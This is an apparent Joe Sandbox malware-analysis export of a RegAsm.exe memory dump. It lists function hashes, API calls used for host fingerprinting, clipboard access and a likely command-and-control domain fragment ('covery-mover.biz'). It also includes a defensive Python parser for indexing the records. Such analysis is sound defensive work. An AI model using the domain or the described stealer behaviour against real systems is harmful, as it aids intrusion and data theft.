                                                                          • Instruction Fuzzy Hash: D302F0B1A083009FD320CF64CC81B5BBBE5EB99314F14982DF6C59B3A1D679E805CB96

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: Uninitialize
                                                                          • String ID: "# `$,$I~$`~$covery-mover.biz$qx$s
                                                                          • API String ID: 3861434553-1062613949
                                                                          • Opcode ID: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                          • Instruction ID: 550626b1aa1881637dc35d229a9c1637f44e71d1f63aa888f187a22684203b49
                                                                          • Opcode Fuzzy Hash: 1bc8a25b561593e53d2d6339a02d65ee242e64d661e98e766194f6cca9f4be8c
                                                                          • Instruction Fuzzy Hash: 2902B0B010C3D18BD3358F2684A07EBBFE1EF92304F189DADD4DA6B252D679040A8B57

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #R,T$$^<P$VW$]~"p$ij$KM
                                                                          • API String ID: 0-788320361
                                                                          • Opcode ID: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                          • Instruction ID: 9ed236048ece28067beed024fb633757567cd4a7e3bca11c75bb2a7735f0e68b
                                                                          • Opcode Fuzzy Hash: 83f2170b8c59a65a8a9960c15d95f04e83c213860b07ad3303ead03e3c572ec6
                                                                          • Instruction Fuzzy Hash: D1F1CAB46083509FD310DF65E88262BBBF1EFD5304F44892DE4958B351EB789A06CB4B

Control-flow Graph
• Graph (image not in text export): function at 40a960, basic blocks 40a960-40ae32; calls 40b6a0, 439b60 and 40a6d0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #xDz$'D F$A|}~$N[\D$N[\D$kl$n
                                                                          • API String ID: 0-490458541
                                                                          • Opcode ID: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                          • Instruction ID: 966b8f91f76bb20883ed88500b6b89ab0c93423946d56f050922860fedc986fe
                                                                          • Opcode Fuzzy Hash: b00241246f4d0228e6e25298a947675e85839165aeb9511d476d344b8fc49fad
                                                                          • Instruction Fuzzy Hash: D7C1267260C3504BC714CF6488905AFBBD3ABC2304F1E893DE9D56B382D679991AC78B

Control-flow Graph
• Graph (image not in text export): function at 40ce55, basic blocks 40ce55-40d29e; calls 408720, 436f90 and 40b6a0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 2AA6A2C71324A32B23D904AF30EFEBBC$F^$I@$N~ :$VgfW$covery-mover.biz$z@(
                                                                          • API String ID: 0-2083548517
                                                                          • Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                          • Instruction ID: b1d760c26d9b90ec4573806c6615211f8657e28aa76e89aec63d6860f5017e85
                                                                          • Opcode Fuzzy Hash: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
                                                                          • Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96

Control-flow Graph
• Graph (image not in text export): function at 4087f0, basic blocks 4087f0-40897b; calls 43afd0, 434680, 43b400, 409cc0, 40cdf0, 40b670 and the APIs GetCurrentProcessId, GetCurrentThreadId, GetForegroundWindow, ExitProcess
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                          • String ID: YO9W
                                                                          • API String ID: 3118123366-386669604
                                                                          • Opcode ID: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                          • Instruction ID: 5b12a659e8285d1355c3597aa5681aa9478bfa7506ef17589c1493984f4e9e7d
                                                                          • Opcode Fuzzy Hash: 81875feee291dd51c94163340b3786e966dc5896524b3e4d2eaf5977dbc455ff
                                                                          • Instruction Fuzzy Hash: 98315977F5061807C31C7AB98C4636AB5874BC4614F0F863E9DD9AB386FDB89C0442D9

Control-flow Graph
• Graph (image not in text export): function at 42bfda, basic blocks 42bfda-42c643; calls 43ce00, 430520 and the APIs FreeLibrary and GetComputerNameExA (two call sites)
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?), ref: 0042C0D7
                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerName$FreeLibrary
                                                                          • String ID: x
                                                                          • API String ID: 2243422189-2363233923
                                                                          • Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                          • Instruction ID: f24e0535182122329204161442b6cb3576d9d8656e0dc52521a12abdc108ad65
                                                                          • Opcode Fuzzy Hash: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
                                                                          • Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57

Control-flow Graph
• Graph (image not in text export): function at 40c36e, basic blocks 40c36e-40c7ff; no calls
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ){+}$4cde$CJ$F'k)$GS
                                                                          • API String ID: 0-4192230409
                                                                          • Opcode ID: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                          • Instruction ID: 6afdb2316fdadaf12e32bd698f1912d34734f08b0bc4a82971b76fff6b28e520
                                                                          • Opcode Fuzzy Hash: 5de04a91f599762488a7f1befa48500976ff1de46b0c1ed8ec4e4c363fac47c6
                                                                          • Instruction Fuzzy Hash: 50B11BB84053058FE354DF629688FAA7BB0FB25310F1A82E9E0992F776D7748405CF96

Control-flow Graph
• Graph (image not in text export): function at 42c6d7, basic blocks 42c6d7-42cddb; calls 43ce00, 41dc20 and the API GetPhysicallyInstalledSystemMemory
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: '$iJ
                                                                          • API String ID: 0-30662343
                                                                          • Opcode ID: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                          • Instruction ID: e8033de2897f6a471e39d6e72682695b514e130b01bc458e21cc2d5cc8d806b0
                                                                          • Opcode Fuzzy Hash: 5f8335f824c18f5e14225d200a316fb8f8740858805ddfb73ef0b7ad87012508
                                                                          • Instruction Fuzzy Hash: 7C02F57060C3E18FD7298F2990A03ABBFE1AF97304F58496ED4D997342D77984058B97

Control-flow Graph
• Graph (image not in text export): function at 42bfd3, basic blocks 42bfd3-42c643 (shares its body with the function at 42bfda above); calls 43ce00, 430520 and the API GetComputerNameExA (two call sites)
                                                                          APIs
                                                                          • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
                                                                          • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: ComputerName
                                                                          • String ID: x
                                                                          • API String ID: 3545744682-2363233923
                                                                          • Opcode ID: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                          • Instruction ID: cbfe56490d4610b99627c39bd120223bdbde8b4c29662e55905f397c0fd00549
                                                                          • Opcode Fuzzy Hash: dd7dd52a73c17c107c662ee8ca0c022aa0f15367076f24ecb02be622242e9914
                                                                          • Instruction Fuzzy Hash: 1AD1176060C7E18ED7358B2894903BFBBD1AF97344F5849AED0D54B382D739940AC797
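The records above (an "APIs" list with call-site refs, a "$"-joined "String ID", an "Opcode ID" and two fuzzy hashes) repeat for every function in the RegAsm memory dump, and the two GetComputerNameExA call sites pass 6 and 5 as the COMPUTER_NAME_FORMAT argument. The parser below is an added example, not Joe Sandbox code and not part of the analysed sample; it assumes the "•" bullet and "ref:" layout of this text export, splits the export into per-function records, decodes the COMPUTER_NAME_FORMAT values from winbase.h, and lets an analyst pivot on an API name or a string fragment such as covery-mover.biz. The sample input is constructed by hand from two records on this page.

```python
"""Parse the per-function records of a Joe Sandbox text export ('APIs', 'Strings',
'Similarity' bullets) into objects an analyst can pivot on. Added example, not Joe
Sandbox code; it assumes the '•' bullet and 'ref:' layout seen in this export."""
import re
from dataclasses import dataclass, field

# COMPUTER_NAME_FORMAT (winbase.h): first argument of GetComputerNameExA/W.
COMPUTER_NAME_FORMAT = {
    0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname",
    2: "ComputerNameDnsDomain", 3: "ComputerNameDnsFullyQualified",
    4: "ComputerNamePhysicalNetBIOS", 5: "ComputerNamePhysicalDnsHostname",
    6: "ComputerNamePhysicalDnsDomain", 7: "ComputerNamePhysicalDnsFullyQualified",
}
# "• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113"
API_CALL_RE = re.compile(r"^•\s*(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")   # generic "• Key: value" bullet

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int                                      # call-site address

@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)
    api_ids: list = field(default_factory=list)   # Joe's '$'-joined "API ID"
    strings: list = field(default_factory=list)   # '$'-separated "String ID"
    fields: dict = field(default_factory=dict)    # Opcode ID, hashes, Source File, ...

def parse_report(text):
    """'Instruction Fuzzy Hash' is the last bullet of every record, so it closes one."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if cur is None:
            cur = FunctionRecord()
        m = API_CALL_RE.match(line)
        if m:
            api, module, args, ref = m.groups()
            cur.api_calls.append(ApiCall(api, module, [a.strip() for a in args.split(",")], int(ref, 16)))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue                              # section headers: APIs, Strings, Similarity, ...
        key, value = m.group(1).strip(), m.group(2).strip()
        if key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "API ID":
            cur.api_ids = [s for s in value.split("$") if s]
        else:
            cur.fields[key] = value
        if key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = None
    if cur is not None and (cur.fields or cur.api_calls):
        records.append(cur)                       # export truncated mid-record
    return records

def computer_name_formats(record):
    """Decode the COMPUTER_NAME_FORMAT argument of each GetComputerNameEx* call."""
    out = []
    for c in record.api_calls:
        if c.api.startswith("GetComputerNameEx") and c.args:
            try:
                out.append(COMPUTER_NAME_FORMAT.get(int(c.args[0], 16), "unknown"))
            except ValueError:                    # argument printed as '?' by the sandbox
                out.append("unknown")
    return out

def find_by_api(records, api_name):
    return [r for r in records if any(c.api == api_name for c in r.api_calls)]

def find_by_string(records, needle):
    return [r for r in records if any(needle in s for s in r.strings)]

# Constructed sample: two records copied by hand from this report's text export.
SAMPLE = """\
APIs
• FreeLibrary.KERNEL32(?), ref: 0042C0D7
• GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042C113
• GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042C1D8
Strings
Similarity
• API ID: ComputerName$FreeLibrary
• String ID: x
• Opcode ID: 212c4427347d00bc0ab6c4fd254bb844e7ef8bf1701165750c227f18fd5959f2
• Instruction Fuzzy Hash: EFD1B46060C3E08ED7358B2994903BFBBD1AFD7344F5849ADD0C99B282D779450ACB57
Strings
Similarity
• API ID:
• String ID: 2AA6A2C71324A32B23D904AF30EFEBBC$F^$I@$N~ :$VgfW$covery-mover.biz$z@(
• Opcode ID: a8b82ccc30708ca5d3da64cc2461f8570c754c905fc98211d30cc89c72c56c70
• Instruction Fuzzy Hash: A191EEB05083C18BD335CF25D8A0BEBBBE0AB96314F148D6DD4DD9B282D738454ACB96
"""
```

Run `parse_report` over the whole saved export rather than the sample to build the index; `find_by_api(records, "GetComputerNameExA")` then returns the host-fingerprinting functions, and `computer_name_formats` shows that the 6 and 5 at 0042C113 and 0042C1D8 request the physical DNS domain and physical DNS hostname, which together with GetPhysicallyInstalledSystemMemory in the neighbouring function is the cluster a detection engineer would look for.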

Control-flow Graph
• Graph (image not in text export): function at 426170, basic blocks 426170-4264f8; calls 439b40, 43b480, 439b60, 407ff0, 408000, 408e90 and 408ff0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 4zVc$8zVc$YNMZ$cba`
                                                                          • API String ID: 2994545307-1799417857
                                                                          • Opcode ID: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                          • Instruction ID: a4538a0261ff6c2ac210d57fc6ac5424e6a326b8b8d8802f404cc31a7d59ec03
                                                                          • Opcode Fuzzy Hash: eaf66d541d549ce35d0b7173bc81318c446716c3833972a3082171e3945cfb6b
                                                                          • Instruction Fuzzy Hash: 189147B2F042208BD724DA25EC8172B7292EBD1314F5A857EEC8597342E678AC00C7DA
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                          • Instruction ID: 4d3fd89be0cb7aed4be93335616a378edd6ad360b4f2b7dd84c825cf95623c92
                                                                          • Opcode Fuzzy Hash: 890e8e76508b01334db47f64388eac8d659fe5be4548ddbfe270fdd3745dd69d
                                                                          • Instruction Fuzzy Hash: 9BA159B16047418FCB24CF34C891663BBE2FF56314B098A6ED49A8B792E738F845CB55
Strings
Memory Dump Source
• Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID: @CDE
• API String ID: 2994545307-1513065382
APIs
• LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Similarity
• API ID:
• String ID: tuv
• API String ID: 0-2475268160
Strings
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Strings
Similarity
• API ID:
• String ID: \U^_
• API String ID: 0-352632802
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
APIs
• GetForegroundWindow.USER32 ref: 0043B720
• GetForegroundWindow.USER32 ref: 0043B740
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
APIs
• RtlReAllocateHeap.NTDLL(?,00000000,?,?,?,?,0040B29B,?,00000001,?,?,?,?,?,?,?), ref: 0043B452
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
Similarity
• API ID: BlanketProxy
• String ID:
• API String ID: 3890896728-0
APIs
• CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CE03
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
APIs
• CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CE35
Similarity
• API ID: InitializeSecurity
• String ID:
• API String ID: 640775948-0
APIs
• RtlFreeHeap.NTDLL(?,00000000,00000000,00412F5C), ref: 00439B80
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
APIs
• RtlAllocateHeap.NTDLL(?,00000000,?,?,00414E57,00000400), ref: 00439B50
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
APIs
  • Part of subcall function 0043B480: LdrInitializeThunk.NTDLL(0043D4FB,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043B4AE
• FreeLibrary.KERNEL32(?), ref: 0041A21A
• FreeLibrary.KERNEL32(?), ref: 0041A29B
Strings
Similarity
• API ID: FreeLibrary$InitializeThunk
• String ID: I,~M$PQ$cba`$cba`$cba`$wEtG
• API String ID: 764372645-3803835663
Strings
Similarity
• API ID:
• String ID: z%|$"r,t$&f?x$3v#H$<b"d$=j9l$cba`$cba`$Z\$^P
• API String ID: 0-3047316687
APIs
Strings
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: K
• API String ID: 2832541153-856455061
Strings
Similarity
• API ID:
• String ID: );?g$9nI9$;>*2$='0{$[93=$cba`$fa
• API String ID: 0-154584671
Strings
Similarity
• API ID:
• String ID: #$0$AGsW$P$k
• API String ID: 0-1629916805
APIs
Strings
Similarity
• API ID: FreeLibrary
• String ID: 3$qjjw
• API String ID: 3664257935-3235754969
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 1/3T$WL$^Q$neA
                                                                          • API String ID: 0-3205570823
                                                                          • Opcode ID: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                          • Instruction ID: 36620dcd79f832a97b090e2ed89ea61b800e286945c25bf48684ec17d430fe28
                                                                          • Opcode Fuzzy Hash: ba18f0a771fe5c943f6b46e4d9dfc1ae68c5ab374dcf48f97578f812035a9b14
                                                                          • Instruction Fuzzy Hash: A9D1CEB4100B01CFD7258F25C8A1BA3BBB1FF86314F19858DC8964F7A2D779A855CB94
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: B:@<$F>?0
                                                                          • API String ID: 0-4011826714
                                                                          • Opcode ID: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                          • Instruction ID: 92ed06d7aa227fc4673e4b6d33fedd1ff2714f2f2b1d0eb8acbab6dee258af69
                                                                          • Opcode Fuzzy Hash: db013f8bcd791390b44068821e0592b044049136823266e2a0b8e4940e29ff84
                                                                          • Instruction Fuzzy Hash: E43256B1A00721CBCB24CF24C892267BBB1FF92310F59825DD8825F796E779A851CBD5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: =UA$cba`
                                                                          • API String ID: 0-2849403845
                                                                          • Opcode ID: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                          • Instruction ID: b0755fcd4efdf1967727a5f4be91126eb1e252dcdfc562f5600afc0ab194aa5f
                                                                          • Opcode Fuzzy Hash: ac233faae9877bc3ddc3a70347ef5b8a5b0ef2ad5a4fd7cdd570c427d15c7cae
                                                                          • Instruction Fuzzy Hash: 9402FE34608300EFD7149F24D962BABB7B1FB9A304F94582DF481972A2D775EC45CB8A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TU$c!"
                                                                          • API String ID: 0-3813282519
                                                                          • Opcode ID: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                          • Instruction ID: a4d5b8c078bf2433dc24120fb7555f1f32600d90c3be649242fb2c546733d6d2
                                                                          • Opcode Fuzzy Hash: 757f52760972d6ea7efb3a276aabc71b80904803bdd1bf2a89c12d688fe9e935
                                                                          • Instruction Fuzzy Hash: 27C16672B04310ABD714DB29ED5277BB3E2EFD5314F48852EE88587381E6BCE801875A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pr$|~
                                                                          • API String ID: 0-4145297803
                                                                          • Opcode ID: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                          • Instruction ID: 1c71e515e24bd4364ede3925d09e369eeeaf8989eca5e2d791649c7508655d54
                                                                          • Opcode Fuzzy Hash: ee8a3b8d263e0e2bc6467c896304b100a01db44200932090249312cc29dfec84
                                                                          • Instruction Fuzzy Hash: E451F0B0A0C3509BD7008F24D8127ABB7F1EF92319F1885AEE4C55B391E7399642CB5E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: pr$|~
                                                                          • API String ID: 0-4145297803
                                                                          • Opcode ID: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                          • Instruction ID: b30244ed6a2ff3de417c81c30de102dda9fa652a451c4e072b4a3ececf8c80cf
                                                                          • Opcode Fuzzy Hash: 1cbfd2780bc33f3a437b09008cb0e627c906c1623d91543066de9fab292285fd
                                                                          • Instruction Fuzzy Hash: B751F4B460C3509BD7009F24C8126ABB7F1EF92315F1885ADE4C55B391E739D642CB5E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BLJB$X
                                                                          • API String ID: 0-2222927247
                                                                          • Opcode ID: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                          • Instruction ID: 1af2eb929763e148cb4abff1c4585c52a2657f08fe5d59f4d12d45bf37d2de30
                                                                          • Opcode Fuzzy Hash: 85d985c10c38fb94c5f45cecc72a4b56871a758ab7e71e90a7e49e993c96917b
                                                                          • Instruction Fuzzy Hash: 13515531708B618BD730DE6894412FBBBE1DF55350F984A3ED8D987382E23CA545E74A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: H.s $ij
                                                                          • API String ID: 0-4017226643
                                                                          • Opcode ID: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                          • Instruction ID: ae217f9daa6f4cce8b7d259f4259de876ba9e86de0ba8af5ed87a71d833a3b47
                                                                          • Opcode Fuzzy Hash: 2cb1b7f925fbc6c9f7264a4edce0ffabfea3ec399ad5ab8651c95cdd20c1a345
                                                                          • Instruction Fuzzy Hash: 0F31DEB260D3908FD314CF65D48165FBBE2EBC6704F55892DE4C56B340CBB49906CB46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: 1/3T
                                                                          • API String ID: 2994545307-3266294232
                                                                          • Opcode ID: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                          • Instruction ID: ff65059a960126ae2aa6a0ba82ae0d71c7a8e5e6bd522a8814a62b27b48fd42c
                                                                          • Opcode Fuzzy Hash: db788342ad88ef6c488a899aa4db307fe01876e7341283b38dbf2834c16ac000
                                                                          • Instruction Fuzzy Hash: 37F1E134204741CFE7258F29D891BB3BBA2FB5A301F1945ADD5D68B392C739E881CB58
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: &tB
                                                                          • API String ID: 0-268467982
                                                                          • Opcode ID: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                          • Instruction ID: 06a34f82c29db43340e48ad1cbe7e395302b1ddd3c50ea808075b5b9ec83bf05
                                                                          • Opcode Fuzzy Hash: ab8b9b4babc4c53dd273e945744bbaef1afa28ee0cdd2d4e334d85f9a15f2521
                                                                          • Instruction Fuzzy Hash: C5E169B5A083618FC7109F14E45136BB7E1AFDA304F0A486EE8C597342D639ED45CB9B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: "
                                                                          • API String ID: 0-123907689
                                                                          • Opcode ID: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                          • Instruction ID: f813c1fc85afd7223dda0e36a8c027de47e21e6ca96e88e37e758e8b14c45e64
                                                                          • Opcode Fuzzy Hash: 4abfa2479a0e4305d02d5d5ee4678300abeb872efe24ce69da09627c08f165b8
                                                                          • Instruction Fuzzy Hash: 03C113B2B043215BD7149E25E44076BB7E5AF84310F59892FEC9687382E738DC59C78B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.1983009042.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
